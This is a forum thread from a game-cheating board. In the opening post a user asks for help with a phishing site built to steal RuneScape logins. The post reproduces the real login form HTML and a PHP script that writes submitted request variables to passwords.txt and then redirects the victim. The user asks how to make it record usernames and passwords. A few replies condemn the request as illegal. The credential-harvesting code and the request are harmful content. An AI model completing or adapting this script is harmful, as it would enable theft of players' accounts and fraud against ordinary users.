Adblock breaks this site

Need phishing help please! 1 SMALL but BIG problem! :(

Discussion in 'RuneScape 3 Cheating' started by greekoz, Nov 20, 2008.

  1. greekoz

    greekoz Member
    Banned

    Joined:
    Sep 21, 2008
    Posts:
    89
    Referrals:
    0
    Sythe Gold:
    0
    Need phishing help please! 1 SMALL but BIG problem! :(

    Well..First of all, I don't know if I'm allowed to ask questions about phishing but the rules say nothing about it, so please give a warning before you flame me/ban me/whatever..

    Okay, on-topic:

    I'm trying to make a good phishing site, and I hardly know anything of PHP, but I know enough to make the entire site, BUT, the jagex login system is so complex for me..look: ( BTW, this is AFTER the "click here if you see large grey screen blablabla.." )

    Code:
    Please enter your username and password to continue.
    
    <div class="loginapplet_wrapper">
    <div class="login_form">
    <form id="login_form" action="https://weblogin.runescape.com/login.ws" method="post" autocomplete="off">
    <div class="section_form">
    <span style="float: left">RuneScape username:</span>
    <input style="float: right" size="20" type="text" name="username" maxlength="12" value="xxxxxx">
    <br class="clear">
    
    </div>
    <div class="section_form">
    <span style="float: left">RuneScape password:</span>
    <input style="float: right" size="20" type="password" name="password" maxlength="20">
    <br class="clear">
    </div>
    <div class="section_form">
    <input type="submit" value="Secure Login">
    </div>
    <div class="section_form">
    <input type="checkbox" name="rem" value="1" checked="true"> Remember my username on this computer
    </div>
    <input type="hidden" name="mod" value="www">
    <input type="hidden" name="ssl" value="0">
    <input type="hidden" name="dest" value="">
    Now to the problem: How do I grab the password out of that???? I used this before, but it doesn't work:

    Code:
    <?php
    header("Location: http://forum.runescape.com/forums.ws?92,93");
    $handle = fopen("passwords.txt", "a");
    foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
    Please someone...how can I get it to save the password and username in passwords.txt? ( or any other file ofcource.. )

    Any help appreciated..
     
  2. nuke4russia

    nuke4russia Active Member
    Banned

    Joined:
    Nov 24, 2007
    Posts:
    194
    Referrals:
    0
    Sythe Gold:
    0
    Need phishing help please! 1 SMALL but BIG problem! :(

    Phishing is not allowed on Sythe. I have reported your post accordingly.
     
  3. greekoz

    greekoz Member
    Banned

    Joined:
    Sep 21, 2008
    Posts:
    89
    Referrals:
    0
    Sythe Gold:
    0
    Need phishing help please! 1 SMALL but BIG problem! :(

    Where does it say it isn't allowed? I can't seem to find it anywhere :S
     
  4. blastboy

    blastboy Forum Addict
    Banned

    Joined:
    Apr 13, 2008
    Posts:
    425
    Referrals:
    0
    Sythe Gold:
    0
    Need phishing help please! 1 SMALL but BIG problem! :(

    lol yeah it not on the rules
     
  5. esteban

    esteban Member

    Joined:
    Oct 14, 2007
    Posts:
    97
    Referrals:
    1
    Sythe Gold:
    5
    Need phishing help please! 1 SMALL but BIG problem! :(

    Phising is illegal. There's no need to have a rule for it.
     
  6. Mike1337

    Mike1337 Forum Addict
    Banned

    Joined:
    Feb 9, 2007
    Posts:
    577
    Referrals:
    0
    Sythe Gold:
    0
    Need phishing help please! 1 SMALL but BIG problem! :(

    So is selling/trading accounts. But we still do it :noworry:
     
< RSbot client does'nt load for me | Are phishing posts allowed? >


 
 
Adblock breaks this site